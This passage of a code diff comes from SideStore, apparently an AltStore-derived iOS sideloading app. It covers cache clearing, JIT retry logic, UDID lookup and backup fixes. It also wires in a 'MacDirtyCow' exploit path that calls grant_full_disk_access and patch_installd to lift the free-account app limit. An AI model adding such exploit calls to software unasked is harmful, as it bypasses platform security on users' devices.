+                footerView.textLabel.isHidden = remainingAppIDs < 0
                 
             case .individual, .organization, .unknown: footerView.textLabel.isHidden = true
             @unknown default: break
@@ -2050,15 +2099,8 @@ extension MyAppsViewController: UIDocumentPickerDelegate
     {
         guard let fileURL = urls.first else { return }
         
-        switch controller.documentPickerMode
+        self.sideloadApp(at: fileURL) { (result) in
-        {
+            print("Sideloaded app at \(fileURL) with result:", result)
-        case .import, .open:
-            self.sideloadApp(at: fileURL) { (result) in
-                print("Sideloaded app at \(fileURL) with result:", result)
-            }
-        
-        case .exportToService, .moveToService: break
-        @unknown default: break
         }
     }
 }

AltStore/News/NewsViewController.swift

@@ -426,6 +426,10 @@ extension NewsViewController: UICollectionViewDelegateFlowLayout
             return previousSize
         }
         
+        // Take layout margins into account.
+        self.prototypeCell.layoutMargins.left = self.view.layoutMargins.left
+        self.prototypeCell.layoutMargins.right = self.view.layoutMargins.right
+        
         let widthConstraint = self.prototypeCell.contentView.widthAnchor.constraint(equalToConstant: collectionView.bounds.width)
         NSLayoutConstraint.activate([widthConstraint])
         defer { NSLayoutConstraint.deactivate([widthConstraint]) }

AltStore/Operations/AuthenticationOperation.swift

@@ -12,6 +12,7 @@ import Network
 
 import AltStoreCore
 import AltSign
+import minimuxer
 
 enum AuthenticationError: LocalizedError
 {
@@ -239,7 +240,7 @@ final class AuthenticationOperation: ResultOperation<(ALTTeam, ALTCertificate, A
                 }
                 
                 let activeAppsMinimumVersion = OperatingSystemVersion(majorVersion: 13, minorVersion: 3, patchVersion: 1)
-                if team.type == .free, ProcessInfo.processInfo.isOperatingSystemAtLeast(activeAppsMinimumVersion)
+                if team.type == .free, ProcessInfo.processInfo.isOperatingSystemAtLeast(activeAppsMinimumVersion), !UserDefaults.standard.isMDCEnabled
                 {
                     UserDefaults.standard.activeAppsLimit = ALTActiveAppsLimit
                 }
@@ -593,7 +594,7 @@ private extension AuthenticationOperation
     
     func registerCurrentDevice(for team: ALTTeam, session: ALTAppleAPISession, completionHandler: @escaping (Result<ALTDevice, Error>) -> Void)
     {
-        guard let udid = Bundle.main.object(forInfoDictionaryKey: Bundle.Info.deviceID) as? String else {
+        guard let udid = fetch_udid()?.toString() else {
             return completionHandler(.failure(OperationError.unknownUDID))
         }
         

AltStore/Operations/BackgroundRefreshAppsOperation.swift

@@ -105,8 +105,13 @@ final class BackgroundRefreshAppsOperation: ResultOperation<[String: Result<Inst
         } catch {
             self.finish(.failure(error))
         }
-        start_auto_mounter(documentsDirectory)
+        if #available(iOS 17, *) {
-        
+            // TODO: iOS 17 and above have a new JIT implementation that is completely broken in SideStore :(
+        }
+        else {
+            start_auto_mounter(documentsDirectory)
+        }
+
         self.managedObjectContext.perform {
             print("Apps to refresh:", self.installedApps.map(\.bundleIdentifier))
             

AltStore/Operations/BackupAppOperation.swift

@@ -29,6 +29,9 @@ class BackupAppOperation: ResultOperation<Void>
     private var appName: String?
     private var timeoutTimer: Timer?
     
+    private weak var applicationWillReturnObserver: NSObjectProtocol?
+    private weak var backupResponseObserver: NSObjectProtocol?
+    
     init(action: Action, context: InstallAppOperationContext)
     {
         self.action = action
@@ -43,10 +46,7 @@ class BackupAppOperation: ResultOperation<Void>
         
         do
         {
-            if let error = self.context.error
+            if let error = self.context.error { throw error }
-            {
-                throw error
-            }
             
             guard let installedApp = self.context.installedApp, let context = installedApp.managedObjectContext else { throw OperationError.invalidParameters }
             context.perform {
@@ -55,9 +55,8 @@ class BackupAppOperation: ResultOperation<Void>
                     let appName = installedApp.name
                     self.appName = appName
                     
-                    guard let altstoreApp = InstalledApp.fetchAltStore(in: context) else { throw OperationError.appNotFound }
+                    let altstoreOpenURL = URL(string: "sidestore://")!
-                    let altstoreOpenURL = altstoreApp.openAppURL
+
-                    
                     var returnURLComponents = URLComponents(url: altstoreOpenURL, resolvingAgainstBaseURL: false)
                     returnURLComponents?.host = "appBackupResponse"
                     guard let returnURL = returnURLComponents?.url else { throw OperationError.openAppFailed(name: appName) }
@@ -153,8 +152,11 @@ private extension BackupAppOperation
 {
     func registerObservers()
     {
-        var applicationWillReturnObserver: NSObjectProtocol!
+        self.applicationWillReturnObserver = NotificationCenter.default.addObserver(forName: UIApplication.willEnterForegroundNotification, object: nil, queue: .main) { [weak self] (notification) in
-        applicationWillReturnObserver = NotificationCenter.default.addObserver(forName: UIApplication.willEnterForegroundNotification, object: nil, queue: .main) { [weak self] (notification) in
+            defer {
+                self?.applicationWillReturnObserver.map { NotificationCenter.default.removeObserver($0) }
+            }
+
             guard let self = self, !self.isFinished else { return }
             
             self.timeoutTimer = Timer.scheduledTimer(withTimeInterval: 5, repeats: false) { [weak self] (timer) in
@@ -166,18 +168,17 @@ private extension BackupAppOperation
                     self.finish(.failure(OperationError.timedOut))
                 }
             }
-            
-            NotificationCenter.default.removeObserver(applicationWillReturnObserver!)
         }
         
-        var backupResponseObserver: NSObjectProtocol!
+        self.backupResponseObserver = NotificationCenter.default.addObserver(forName: AppDelegate.appBackupDidFinish, object: nil, queue: nil) { [weak self] (notification) in
-        backupResponseObserver = NotificationCenter.default.addObserver(forName: AppDelegate.appBackupDidFinish, object: nil, queue: nil) { [weak self] (notification) in
+            defer {
+                self?.backupResponseObserver.map { NotificationCenter.default.removeObserver($0) }
+            }
+            
             self?.timeoutTimer?.invalidate()
             
             let result = notification.userInfo?[AppDelegate.appBackupResultKey] as? Result<Void, Error> ?? .failure(OperationError.unknownResult)
             self?.finish(result)
-            
-            NotificationCenter.default.removeObserver(backupResponseObserver!)
         }
     }
 }

AltStore/Operations/ClearAppCacheOperation.swift

@@ -0,0 +1,208 @@
+//
+//  ClearAppCacheOperation.swift
+//  AltStore
+//
+//  Created by Riley Testut on 9/27/22.
+//  Copyright © 2022 Riley Testut. All rights reserved.
+//
+
+import Foundation
+import AltStoreCore
+/*
+struct BatchError: ALTLocalizedError
+{
+
+    enum Code: Int, ALTErrorCode
+    {
+        typealias Error = BatchError
+        
+        case batchError
+    }
+
+    var code: Code = .batchError
+    var underlyingErrors: [Error]
+    
+    var errorTitle: String?
+    var errorFailure: String?
+    
+    init(errors: [Error])
+    {
+        self.underlyingErrors = errors
+    }
+    
+    var errorFailureReason: String {
+        guard !self.underlyingErrors.isEmpty else { return NSLocalizedString("An unknown error occured.", comment: "") }
+        
+        let errorMessages = self.underlyingErrors.map { $0.localizedDescription }
+        
+        let message = errorMessages.joined(separator: "\n\n")
+        return message
+    }
+}
+*/
+@objc(ClearAppCacheOperation)
+class ClearAppCacheOperation: ResultOperation<Void>
+{
+    private let coordinator = NSFileCoordinator()
+    private let coordinatorQueue = OperationQueue()
+    
+    override init()
+    {
+        self.coordinatorQueue.name = "AltStore - ClearAppCacheOperation Queue"
+    }
+    
+    override func main()
+    {
+        super.main()
+        
+        var allErrors = [Error]()
+        
+        self.clearTemporaryDirectory { result in
+            switch result
+            {
+            //case .failure(let batchError as BatchError): allErrors.append(contentsOf: batchError.underlyingErrors)
+            case .failure(let error): allErrors.append(error)
+            case .success: break
+            }
+            
+            self.removeUninstalledAppBackupDirectories { result in
+                switch result
+                {
+                //case .failure(let batchError as BatchError): allErrors.append(contentsOf: batchError.underlyingErrors)
+                case .failure(let error): allErrors.append(error)
+                case .success: break
+                }
+                
+                if allErrors.isEmpty
+                {
+                    self.finish(.success(()))
+                }
+                else
+                {
+                    self.finish(.failure(OperationError.cacheClearError(errors: allErrors.map({ error in
+                        return error.localizedDescription
+                    }))))
+                }
+            }
+        }
+    }
+}
+
+private extension ClearAppCacheOperation
+{
+    func clearTemporaryDirectory(completion: @escaping (Result<Void, Error>) -> Void)
+    {
+        let intent = NSFileAccessIntent.writingIntent(with: FileManager.default.temporaryDirectory, options: [.forDeleting])
+        self.coordinator.coordinate(with: [intent], queue: self.coordinatorQueue) { (error) in
+            do
+            {
+                if let error
+                {
+                    throw error
+                }
+                
+                let fileURLs = try FileManager.default.contentsOfDirectory(at: intent.url,
+                                                                           includingPropertiesForKeys: [],
+                                                                           options: [.skipsSubdirectoryDescendants, .skipsHiddenFiles])
+                var errors = [Error]()
+                
+                for fileURL in fileURLs
+                {
+                    do
+                    {
+                        print("[ALTLog] Removing item from temporary directory:", fileURL.lastPathComponent)
+                        try FileManager.default.removeItem(at: fileURL)
+                    }
+                    catch
+                    {
+                        print("[ALTLog] Failed to remove \(fileURL.lastPathComponent) from temporary directory.", error)
+                        errors.append(error)
+                    }
+                }
+                
+                if !errors.isEmpty
+                {
+                    completion(.failure(OperationError.cacheClearError(errors: errors.map({ error in
+                        return error.localizedDescription
+                    }))))
+                }
+                else
+                {
+                    completion(.success(()))
+                }
+            }
+            catch
+            {
+                completion(.failure(error))
+            }
+        }
+    }
+    
+    func removeUninstalledAppBackupDirectories(completion: @escaping (Result<Void, Error>) -> Void)
+    {
+        guard let backupsDirectory = FileManager.default.appBackupsDirectory else { return completion(.failure(OperationError.missingAppGroup)) }
+        
+        DatabaseManager.shared.persistentContainer.performBackgroundTask { context in
+            let installedAppBundleIDs = Set(InstalledApp.all(in: context).map { $0.bundleIdentifier })
+            
+            let intent = NSFileAccessIntent.writingIntent(with: backupsDirectory, options: [.forDeleting])
+            self.coordinator.coordinate(with: [intent], queue: self.coordinatorQueue) { (error) in
+                do
+                {
+                    if let error
+                    {
+                        throw error
+                    }
+                    
+                    var isDirectory: ObjCBool = false
+                    guard FileManager.default.fileExists(atPath: intent.url.path, isDirectory: &isDirectory), isDirectory.boolValue else {
+                        completion(.success(()))
+                        return
+                    }
+                    
+                    let fileURLs = try FileManager.default.contentsOfDirectory(at: intent.url,
+                                                                               includingPropertiesForKeys: [.isDirectoryKey, .nameKey],
+                                                                               options: [.skipsSubdirectoryDescendants, .skipsHiddenFiles])
+                    var errors = [Error]()
+                    
+                    
+                    for backupDirectory in fileURLs
+                    {
+                        do
+                        {
+                            let resourceValues = try backupDirectory.resourceValues(forKeys: [.isDirectoryKey, .nameKey])
+                            guard let isDirectory = resourceValues.isDirectory, let bundleID = resourceValues.name else { continue }
+
+                            if isDirectory && !installedAppBundleIDs.contains(bundleID) && !AppManager.shared.isActivelyManagingApp(withBundleID: bundleID)
+                            {
+                                print("[ALTLog] Removing backup directory for uninstalled app:", bundleID)
+                                try FileManager.default.removeItem(at: backupDirectory)
+                            }
+                        }
+                        catch
+                        {
+                            print("[ALTLog] Failed to remove app backup directory:", error)
+                            errors.append(error)
+                        }
+                    }
+                    
+                    if !errors.isEmpty
+                    {
+                        completion(.failure(OperationError.cacheClearError(errors: errors.map({ error in
+                            return error.localizedDescription
+                        }))))
+                    }
+                    else
+                    {
+                        completion(.success(()))
+                    }
+                }
+                catch
+                {
+                    print("[ALTLog] Failed to remove app backup directory:", error)
+                    completion(.failure(error))
+                }
+            }
+        }
+    }
+}

AltStore/Operations/DeactivateAppOperation.swift

@@ -31,11 +31,7 @@ final class DeactivateAppOperation: ResultOperation<InstalledApp>
     {
         super.main()
         
-        if let error = self.context.error
+        if let error = self.context.error { return self.finish(.failure(error)) }
-        {
-            self.finish(.failure(error))
-            return
-        }
         
         DatabaseManager.shared.persistentContainer.performBackgroundTask { (context) in
             let installedApp = context.object(with: self.app.objectID) as! InstalledApp
@@ -45,14 +41,14 @@ final class DeactivateAppOperation: ResultOperation<InstalledApp>
             for profile in allIdentifiers {
                 do {
                     try remove_provisioning_profile(profile)
+                    self.progress.completedUnitCount += 1
+                    installedApp.isActive = false
+                    self.finish(.success(installedApp))
+                    break
                 } catch {
-                    return self.finish(.failure(error))
+                    self.finish(.failure(error))
                 }
             }
-            
-            self.progress.completedUnitCount += 1
-            installedApp.isActive = false
-            self.finish(.success(installedApp))
         }
     }
 }

AltStore/Operations/EnableJITOperation.swift

@@ -45,13 +45,19 @@ final class EnableJITOperation<Context: EnableJITContext>: ResultOperation<Void>
         guard let installedApp = self.context.installedApp else { return self.finish(.failure(OperationError.invalidParameters)) }
         
         installedApp.managedObjectContext?.perform {
-            do {
+            var retries = 3
-                try debug_app(installedApp.resignedBundleIdentifier)
+            while (retries > 0){
-            } catch {
+                do {
-                return self.finish(.failure(error))
+                    try debug_app(installedApp.resignedBundleIdentifier)
+                    self.finish(.success(()))
+                    retries = 0
+                } catch {
+                    retries -= 1
+                    if (retries <= 0){
+                        self.finish(.failure(error))
+                    }
+                }
             }
-            
-            self.finish(.success(()))
         }
     }
 }

AltStore/Operations/FetchAnisetteDataOperation.swift

@@ -218,7 +218,7 @@ final class FetchAnisetteDataOperation: ResultOperation<ALTAnisetteData>, WebSoc
         self.socket.connect()
     }
     
-    func didReceive(event: WebSocketEvent, client: WebSocket) {
+    func didReceive(event: WebSocketEvent, client: WebSocketClient) {
         switch event {
         case .text(let string):
             do {
@@ -429,7 +429,7 @@ final class FetchAnisetteDataOperation: ResultOperation<ALTAnisetteData>, WebSoc
     }
 }
 
-extension WebSocket {
+extension WebSocketClient {
     func json(_ dictionary: [String: String]) {
         let data = try! JSONSerialization.data(withJSONObject: dictionary, options: [])
         self.write(string: String(data: data, encoding: .utf8)!)

AltStore/Operations/FetchProvisioningProfilesOperation.swift

@@ -262,10 +262,6 @@ extension FetchProvisioningProfilesOperation
                             {
                                 throw OperationError.maximumAppIDLimitReached(application: application, requiredAppIDs: requiredAppIDs, availableAppIDs: availableAppIDs, nextExpirationDate: expirationDate)
                             }
-                            else
-                            {
-                                throw ALTAppleAPIError(.maximumAppIDLimitReached)
-                            }
                         }
                     }
                     //App ID name must be ascii. If the name is not ascii, using bundleID instead

AltStore/Operations/InstallAppOperation.swift

@@ -12,6 +12,9 @@ import AltStoreCore
 import AltSign
 import Roxas
 import minimuxer
+#if MACDIRTYCOW
+import MacDirtyCow
+#endif
 
 @objc(InstallAppOperation)
 final class InstallAppOperation: ResultOperation<InstalledApp>
@@ -41,12 +44,14 @@ final class InstallAppOperation: ResultOperation<InstalledApp>
         
         guard
             let certificate = self.context.certificate,
-            let resignedApp = self.context.resignedApp
+            let resignedApp = self.context.resignedApp,
+            let provisioningProfiles = self.context.provisioningProfiles
         else { return self.finish(.failure(OperationError.invalidParameters)) }
         
         let backgroundContext = DatabaseManager.shared.persistentContainer.newBackgroundContext()
         backgroundContext.perform {
             
+            
             /* App */
             let installedApp: InstalledApp
             
@@ -116,8 +121,7 @@ final class InstallAppOperation: ResultOperation<InstalledApp>
             // Temporary directory and resigned .ipa no longer needed, so delete them now to ensure AltStore doesn't quit before we get the chance to.
             self.cleanUp()
             
-            var activeProfiles: Set<String>?
+            if let sideloadedAppsLimit = UserDefaults.standard.activeAppsLimit, provisioningProfiles.contains(where: { $1.isFreeProvisioningProfile == true })
-            if let sideloadedAppsLimit = UserDefaults.standard.activeAppsLimit
             {
                 // When installing these new profiles, AltServer will remove all non-active profiles to ensure we remain under limit.
                 
@@ -142,15 +146,14 @@ final class InstallAppOperation: ResultOperation<InstalledApp>
                         installedApp.isActive = false
                     }
                 }
-
+            }
-                activeProfiles = Set(activeApps.flatMap { (installedApp) -> [String] in
+            else
-                    let appExtensionProfiles = installedApp.appExtensions.map { $0.resignedBundleIdentifier }
+            {
-                    return [installedApp.resignedBundleIdentifier] + appExtensionProfiles
+                installedApp.isActive = true
-                })
             }
             
             var installing = true
-            if installedApp.storeApp?.bundleIdentifier == Bundle.Info.appbundleIdentifier {
+            if installedApp.storeApp?.bundleIdentifier.range(of: Bundle.Info.appbundleIdentifier) != nil {
                 // Reinstalling ourself will hang until we leave the app, so we need to exit it without force closing
                 DispatchQueue.main.asyncAfter(deadline: .now() + 3) {
                     if UIApplication.shared.applicationState != .active {
@@ -162,30 +165,26 @@ final class InstallAppOperation: ResultOperation<InstalledApp>
                         return
                     }
                     print("We are still installing after 3 seconds")
-                    
                     UNUserNotificationCenter.current().getNotificationSettings { settings in
                         switch (settings.authorizationStatus) {
                         case .authorized, .ephemeral, .provisional:
                             print("Notifications are enabled")
-                            
+
                             let content = UNMutableNotificationContent()
                             content.title = "Refreshing..."
-                            content.body = "To finish refreshing, SideStore must be moved to the background, which it does by opening Safari. Please reopen SideStore after it is done refreshing!"
+                            content.body = "SideStore will automatically move to the homescreen to finish refreshing!"
                             let notification = UNNotificationRequest(identifier: Bundle.Info.appbundleIdentifier + ".FinishRefreshNotification", content: content, trigger: UNTimeIntervalNotificationTrigger(timeInterval: 2, repeats: false))
                             UNUserNotificationCenter.current().add(notification)
-                            
-                            DispatchQueue.main.async { UIApplication.shared.open(URL(string: "x-web-search://")!) }
-                            
                             break
                         default:
                             print("Notifications are not enabled")
-                            
+
-                            let alert = UIAlertController(title: "Finish Refresh", message: "To finish refreshing, SideStore must be moved to the background. To do this, you can either go to the Home Screen or open Safari by pressing Continue. Please reopen SideStore after doing this.", preferredStyle: .alert)
+                            let alert = UIAlertController(title: "Finish Refresh", message: "Please reopen SideStore after the process is finished.To finish refreshing, SideStore must be moved to the background. To do this, you can either go to the Home Screen manually or by hitting Continue. Please reopen SideStore after doing this.", preferredStyle: .alert)
                             alert.addAction(UIAlertAction(title: NSLocalizedString("Continue", comment: ""), style: .default, handler: { _ in
-                                print("Opening Safari")
+                                print("Going home")
-                                DispatchQueue.main.async { UIApplication.shared.open(URL(string: "x-web-search://")!) }
+                                UIApplication.shared.perform(#selector(NSXPCConnection.suspend))
                             }))
-                            
+
                             DispatchQueue.main.async {
                                 let keyWindow = UIApplication.shared.windows.filter { $0.isKeyWindow }.first
                                 if var topController = keyWindow?.rootViewController {
@@ -194,27 +193,56 @@ final class InstallAppOperation: ResultOperation<InstalledApp>
                                     }
                                     topController.present(alert, animated: true)
                                 } else {
-                                    print("No key window? Let's just open Safari")
+                                    print("No key window? Let's just go home")
-                                    UIApplication.shared.open(URL(string: "x-web-search://")!)
                                 }
                             }
-                            
-                            break
                         }
                     }
+                    UIApplication.shared.perform(#selector(NSXPCConnection.suspend))
                 }
             }
             
             do {
+                #if MACDIRTYCOW
+                if UserDefaults.standard.isMDCEnabled {
+                    grant_full_disk_access { error in
+                        if error != nil {
+                            self.finish(.failure(OperationError.mdcExploitFailed))
+                            return
+                        }
+                        if !patch_installd() {
+                            self.finish(.failure(OperationError.mdcExploitFailed))
+                            return
+                        }
+                        
+                        do
+                        {
+                            try install_ipa(installedApp.bundleIdentifier)
+                            installing = false
+                            installedApp.refreshedDate = Date()
+                            self.finish(.success(installedApp))
+                        } catch let error {
+                            installing = false
+                            self.finish(.failure(error))
+                        }
+                    }
+                }
+                else {
+                    try install_ipa(installedApp.bundleIdentifier)
+                    installing = false
+                    installedApp.refreshedDate = Date()
+                    self.finish(.success(installedApp))
+                }
+                #else
                 try install_ipa(installedApp.bundleIdentifier)
                 installing = false
-            } catch {
+                installedApp.refreshedDate = Date()
+                self.finish(.success(installedApp))
+                #endif
+            } catch let error {
                 installing = false
-                return self.finish(.failure(error))
+                self.finish(.failure(error))
             }
-            
-            installedApp.refreshedDate = Date()
-            self.finish(.success(installedApp))
         }
     }
     

AltStore/Operations/OperationError.swift

@@ -34,10 +34,16 @@ enum OperationError: LocalizedError
     case openAppFailed(name: String)
     case missingAppGroup
     
+    case noWiFi
+    case tooNewError
     case anisetteV1Error(message: String)
     case provisioningError(result: String, message: String?)
     case anisetteV3Error(message: String)
     
+    case mdcExploitFailed
+    
+    case cacheClearError(errors: [String])
+    
     var failureReason: String? {
         switch self {
         case .unknown: return NSLocalizedString("An unknown error occured.", comment: "")
@@ -53,9 +59,13 @@ enum OperationError: LocalizedError
         case .openAppFailed(let name): return String(format: NSLocalizedString("SideStore was denied permission to launch %@.", comment: ""), name)
         case .missingAppGroup: return NSLocalizedString("SideStore's shared app group could not be found.", comment: "")
         case .maximumAppIDLimitReached: return NSLocalizedString("Cannot register more than 10 App IDs.", comment: "")
+        case .noWiFi: return NSLocalizedString("You do not appear to be connected to WiFi!\nSideStore will never be able to install or refresh applications without WiFi.", comment: "")
+        case .tooNewError: return NSLocalizedString("iOS 17 has changed how JIT is enabled therefore SideStore cannot enable it at this time, sorry for any inconvenience.\nWe will let everyone know once we have a solution!", comment: "")
         case .anisetteV1Error(let message): return String(format: NSLocalizedString("An error occurred when getting anisette data from a V1 server: %@. Try using another anisette server.", comment: ""), message)
         case .provisioningError(let result, let message): return String(format: NSLocalizedString("An error occurred when provisioning: %@%@. Please try again. If the issue persists, report it on GitHub Issues!", comment: ""), result, message != nil ? (" (" + message! + ")") : "")
         case .anisetteV3Error(let message): return String(format: NSLocalizedString("An error occurred when getting anisette data from a V3 server: %@. Please try again. If the issue persists, report it on GitHub Issues!", comment: ""), message)
+        case .mdcExploitFailed: return NSLocalizedString("An error occured while running MDC exploit, try disabling it in settings", comment: "")
+        case .cacheClearError(let errors): return String(format: NSLocalizedString("An error occurred while clearing cache: %@", comment: ""), errors.joined(separator: "\n"))
         }
     }
     
@@ -138,8 +148,8 @@ extension MinimuxerError: LocalizedError {
             return self.createService(name: "AFC")
         case .RwAfc:
             return NSLocalizedString("AFC was unable to manage files on the device", comment: "")
-        case .InstallApp:
+        case .InstallApp(let message):
-            return NSLocalizedString("Unable to install the app from the staging directory", comment: "")
+            return NSLocalizedString("Unable to install the app: \(message.toString())", comment: "")
         case .UninstallApp:
             return NSLocalizedString("Unable to uninstall the app", comment: "")
 

AltStore/Operations/RefreshAppOperation.swift

@@ -35,31 +35,28 @@ final class RefreshAppOperation: ResultOperation<InstalledApp>
         
         do
         {
-            if let error = self.context.error
+            if let error = self.context.error { return self.finish(.failure(error)) }
-            {
-                throw error
-            }
             
-            guard let profiles = self.context.provisioningProfiles else { throw OperationError.invalidParameters }
+            guard let profiles = self.context.provisioningProfiles else { return self.finish(.failure(OperationError.invalidParameters)) }
+            guard let app = self.context.app else { return self.finish(.failure(OperationError.appNotFound)) }
             
-            guard let app = self.context.app else { throw OperationError.appNotFound }
+            for p in profiles {
-            
+                do {
-            DatabaseManager.shared.persistentContainer.performBackgroundTask { (context) in
+                    let bytes = p.value.data.toRustByteSlice()
-                print("Sending refresh app request...")
+                    try install_provisioning_profile(bytes.forRust())
+                } catch {
+                    self.finish(.failure(MinimuxerError.ProfileInstall))
+                }
 
-                for p in profiles {
+                DatabaseManager.shared.persistentContainer.performBackgroundTask { (context) in
-                    do {
+                print("Sending refresh app request...")
-                        let bytes = p.value.data.toRustByteSlice()
-                        try install_provisioning_profile(bytes.forRust())
-                    } catch {
-                        return self.finish(.failure(error))
-                    }
                     
                     self.progress.completedUnitCount += 1
                     
                     let predicate = NSPredicate(format: "%K == %@", #keyPath(InstalledApp.bundleIdentifier), app.bundleIdentifier)
                     self.managedObjectContext.perform {
                         guard let installedApp = InstalledApp.first(satisfying: predicate, in: self.managedObjectContext) else {
+                            self.finish(.failure(OperationError.appNotFound))
                             return
                         }
                         installedApp.update(provisioningProfile: p.value)
@@ -72,9 +69,5 @@ final class RefreshAppOperation: ResultOperation<InstalledApp>
                 }
             }
         }
-        catch
-        {
-            self.finish(.failure(error))
-        }
     }
 }

AltStore/Operations/ResignAppOperation.swift

@@ -11,6 +11,7 @@ import Roxas
 
 import AltStoreCore
 import AltSign
+import minimuxer
 
 @objc(ResignAppOperation)
 final class ResignAppOperation: ResultOperation<ALTApplication>
@@ -181,7 +182,7 @@ private extension ResignAppOperation
 
                 if app.isAltStoreApp
                 {
-                    guard let udid = Bundle.main.object(forInfoDictionaryKey: Bundle.Info.deviceID) as? String else { throw OperationError.unknownUDID }
+                    guard let udid = fetch_udid()?.toString() as? String else { throw OperationError.unknownUDID }
                     guard let pairingFileString = Bundle.main.object(forInfoDictionaryKey: Bundle.Info.devicePairingString) as? String else { throw OperationError.unknownUDID }                    
                     additionalValues[Bundle.Info.devicePairingString] = pairingFileString
                     additionalValues[Bundle.Info.deviceID] = udid
@@ -202,7 +203,7 @@ private extension ResignAppOperation
                         // The embedded certificate + certificate identifier are already in app bundle, no need to update them.
                     }
                 }
-                else if infoDictionary.keys.contains(Bundle.Info.deviceID), let udid = Bundle.main.object(forInfoDictionaryKey: Bundle.Info.deviceID) as? String
+                else if infoDictionary.keys.contains(Bundle.Info.deviceID), let udid = fetch_udid()?.toString() as? String
                 {
                     // There is an ALTDeviceID entry, so assume the app is using AltKit and replace it with the device's UDID.
                     additionalValues[Bundle.Info.deviceID] = udid
@@ -227,6 +228,7 @@ private extension ResignAppOperation
                 
                 // Prepare app
                 try prepare(appBundle, additionalInfoDictionaryValues: additionalValues)
+                try self.removeMissingAppExtensionReferences(from: appBundle)
                 
                 if let directory = appBundle.builtInPlugInsURL, let enumerator = FileManager.default.enumerator(at: directory, includingPropertiesForKeys: nil, options: [.skipsSubdirectoryDescendants])
                 {
@@ -267,4 +269,28 @@ private extension ResignAppOperation
         
         return progress
     }
+    
+    func removeMissingAppExtensionReferences(from bundle: Bundle) throws
+    {
+        // If app extensions have been removed from an app (either by AltStore or the developer),
+        // we must remove all references to them from SC_Info/Manifest.plist (if it exists).
+        
+        let scInfoURL = bundle.bundleURL.appendingPathComponent("SC_Info")
+        let manifestPlistURL = scInfoURL.appendingPathComponent("Manifest.plist")
+        
+        guard let manifestPlist = NSMutableDictionary(contentsOf: manifestPlistURL), let sinfReplicationPaths = manifestPlist["SinfReplicationPaths"] as? [String] else { return }
+        
+        // Remove references to missing files.
+        let filteredReplicationPaths = sinfReplicationPaths.filter { path in
+            guard let fileURL = URL(string: path, relativeTo: bundle.bundleURL) else { return false }
+            
+            let fileExists = FileManager.default.fileExists(atPath: fileURL.path)
+            return fileExists
+        }
+        
+        manifestPlist["SinfReplicationPaths"] = filteredReplicationPaths
+        
+        // Save updated Manifest.plist to disk.
+        try manifestPlist.write(to: manifestPlistURL)
+    }
 }

AltStore/Operations/SendAppOperation.swift

@@ -33,8 +33,7 @@ final class SendAppOperation: ResultOperation<()>
         
         if let error = self.context.error
         {
-            self.finish(.failure(error))
+            return self.finish(.failure(error))
-            return
         }
         
         guard let resignedApp = self.context.resignedApp else { return self.finish(.failure(OperationError.invalidParameters)) }
@@ -49,15 +48,16 @@ final class SendAppOperation: ResultOperation<()>
             do {
                 let bytes = Data(data).toRustByteSlice()
                 try yeet_app_afc(app.bundleIdentifier, bytes.forRust())
+                self.progress.completedUnitCount += 1
+                self.finish(.success(()))
             } catch {
-                return self.finish(.failure(error))
+                self.finish(.failure(MinimuxerError.RwAfc))
+                self.progress.completedUnitCount += 1
+                self.finish(.success(()))
             }
-            
-            self.progress.completedUnitCount += 1
-            self.finish(.success(()))
         } else {
             print("IPA doesn't exist????")
-            self.finish(.failure(ALTServerError(.underlyingError)))
+            self.finish(.failure(OperationError.appNotFound))
         }
     }
 }

AltStore/Resources/Assets.xcassets/AppIcon.appiconset/Contents.json

@@ -1 +1,158 @@
-{"images":[{"size":"60x60","expected-size":"180","filename":"180.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"3x"},{"size":"40x40","expected-size":"80","filename":"80.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"2x"},{"size":"40x40","expected-size":"120","filename":"120.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"3x"},{"size":"60x60","expected-size":"120","filename":"120.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"2x"},{"size":"57x57","expected-size":"57","filename":"57.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"1x"},{"size":"29x29","expected-size":"58","filename":"58.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"2x"},{"size":"29x29","expected-size":"29","filename":"29.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"1x"},{"size":"29x29","expected-size":"87","filename":"87.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"3x"},{"size":"57x57","expected-size":"114","filename":"114.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"2x"},{"size":"20x20","expected-size":"40","filename":"40.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"2x"},{"size":"20x20","expected-size":"60","filename":"60.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"iphone","scale":"3x"},{"size":"1024x1024","filename":"1024.png","expected-size":"1024","idiom":"ios-marketing","folder":"Assets.xcassets/AppIcon.appiconset/","scale":"1x"},{"size":"40x40","expected-size":"80","filename":"80.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"2x"},{"size":"72x72","expected-size":"72","filename":"72.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"1x"},{"size":"76x76","expected-size":"152","filename":"152.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"2x"},{"size":"50x50","expected-size":"100","filename":"100.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"2x"},{"size":"29x29","expected-size":"58","filename":"58.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"2x"},{"size":"76x76","expected-size":"76","filename":"76.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"1x"},{"size":"29x29","expected-size":"29","filename":"29.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"1x"},{"size":"50x50","expected-size":"50","filename":"50.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"1x"},{"size":"72x72","expected-size":"144","filename":"144.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"2x"},{"size":"40x40","expected-size":"40","filename":"40.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"1x"},{"size":"83.5x83.5","expected-size":"167","filename":"167.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"2x"},{"size":"20x20","expected-size":"20","filename":"20.png","folder":"Assets.xcassets/